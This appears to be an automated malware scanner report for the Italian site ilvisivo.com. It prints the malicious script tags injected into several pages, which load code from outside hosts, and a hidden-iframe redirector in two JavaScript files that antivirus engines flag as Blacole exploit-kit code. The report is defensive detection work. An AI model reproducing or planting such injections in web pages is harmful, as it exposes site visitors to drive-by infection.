New scan:

Malware Scanner report for ilvisivo.com

Malicious/Suspicious/Total urls checked
2/4/16
6 pages have malicious or suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.ilvisivo.com/
HTTP/1.1 200 OK
Date: Sun, 18 Jan 2015 11:31:30 GMT
Accept-Ranges: bytes
ETag: "a327ae7eed24cf1:4eb4fe"
Server: Microsoft-IIS/6.0
Content-Length: 9552
Content-Location: http://www.ilvisivo.com/index.htm
Content-Type: text/html
Last-Modified: Sat, 08 Feb 2014 16:47:46 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
clean
http://www.ilvisivo.com/index.htm
200 OK
Content-Length: 9552
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://goshin-dojo.de/dtd.php?id=6019400"></script>

http://www.ilvisivo.com/index_htm_files/roe.js
200 OK
Content-Length: 5954
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){ var a = document.createElement('iframe'); a.src = 'http://bygotbys.ru/count3.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>'); document.getElementById('mira').appendChild(a); }})();




... 3116 bytes are skipped ...
= document.cookie.indexOf( name "=" ); var len = start name.length 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}



Antivirus reports:

AntiVir
JS/iFrame.kpp
Avast
JS:Decode-ARV [Trj]
Ad-Aware
JS:Trojan.Script.AAL
Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Script.AAL
TrendMicro-HouseCall
JS_BLACOLE.SMJF
Comodo
TrojWare.JS.Agent.DU
Emsisoft
JS:Trojan.Script.AAL (B)
K7GW
Exploit ( 04c551131 )
McAfee-GW-Edition
JS/Exploit-Blacole.gc
TrendMicro
JS_BLACOLE.SMJF
Microsoft
Trojan:JS/BlacoleRef.CL
Kaspersky
Trojan.JS.Redirector.ye
MicroWorld-eScan
JS:Trojan.Script.AAL
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Exploit-Blacole.gc
NANO-Antivirus
Trojan.Script.Iframe.bcslpm
F-Secure
JS:Trojan.Script.AAL
VIPRE
Trojan.JS.Generic (v)
F-Prot
JS/IFrame.RS.gen
AVG
HTML/Framer
Norman
Blacole.XE
GData
JS:Trojan.Script.AAL
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.AAL

http://www.ilvisivo.com/servizi.htm
200 OK
Content-Length: 7429
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://goshin-dojo.de/dtd.php?id=6019404"></script>

http://www.ilvisivo.com/dove.htm
200 OK
Content-Length: 7837
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://eisl-family.at/includes/relay.php?id=683980"></script>

http://www.ilvisivo.com/galleria.htm
200 OK
Content-Length: 10189
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://goshin-dojo.de/dtd.php?id=6019399"></script>

http://www.ilvisivo.com/index_htm_files/highslide.js
200 OK
Content-Length: 59421
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)


if(!hs){var hs={lang:{cssDirection:"ltr",loadingText:"Loading...",loadingTitle:"Click to cancel",focusTitle:"Click to bring to front",fullExpandTitle:"Expand to actual size (f)",creditsText:"Powered by <i>Highslide JS</i>",creditsTitle:"Go to the Highslide JS homepage",previousText:"Previous",nextText:"Next",moveText:"Move",closeText:"Close",closeTitle:"Close (esc)",resizeTitle:"Resize",playText:"Play",playTitle:"Play slideshow (spacebar)",pauseText:"Pause",pauseTitle:"Pause sl
... 3233 bytes are skipped ...
= document.cookie.indexOf( name "=" ); var len = start name.length 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}



Antivirus reports:

AntiVir
JS/Agent.axqoua
Avast
JS:Decode-ARV [Trj]
TrendMicro-HouseCall
TROJ_GEN.F47V0123
Comodo
TrojWare.JS.Agent.AXQ
Microsoft
Trojan:JS/Quidvetis.A
Fortinet
JS/Blacole.EU!tr.dldr
AVG
HTML/Framer
Norman
Blacole.XE

http://www.ilvisivo.com/index_htm_files/57.jpg
200 OK
Content-Length: 27955
Content-Type: image/jpeg
clean
http://www.ilvisivo.com/test404page.js
404 Not Found
Content-Length: 1635
Content-Type: text/html
clean
http://www.ilvisivo.com/index_htm_files/58.jpg
200 OK
Content-Length: 28971
Content-Type: image/jpeg
clean
http://www.ilvisivo.com/index_htm_files/59.jpg
200 OK
Content-Length: 29257
Content-Type: image/jpeg
clean
http://www.ilvisivo.com/index_htm_files/60.jpg
200 OK
Content-Length: 36042
Content-Type: image/jpeg
clean
http://www.ilvisivo.com/index_htm_files/61.jpg
200 OK
Content-Length: 31666
Content-Type: image/jpeg
clean
http://www.ilvisivo.com/index_htm_files/62.jpg
200 OK
Content-Length: 17223
Content-Type: image/jpeg
clean
http://www.ilvisivo.com/index_htm_files/63.jpg
200 OK
Content-Length: 16177
Content-Type: image/jpeg
clean
http://www.ilvisivo.com/index_htm_files/64.jpg
200 OK
Content-Length: 39379
Content-Type: image/jpeg
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ilvisivo.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ilvisivo.com
Referer: http://www.google.com/search?q=ilvisivo.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ilvisivo.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ilvisivo.com/

Result: ilvisivo.com is not infected or malware details are not published yet.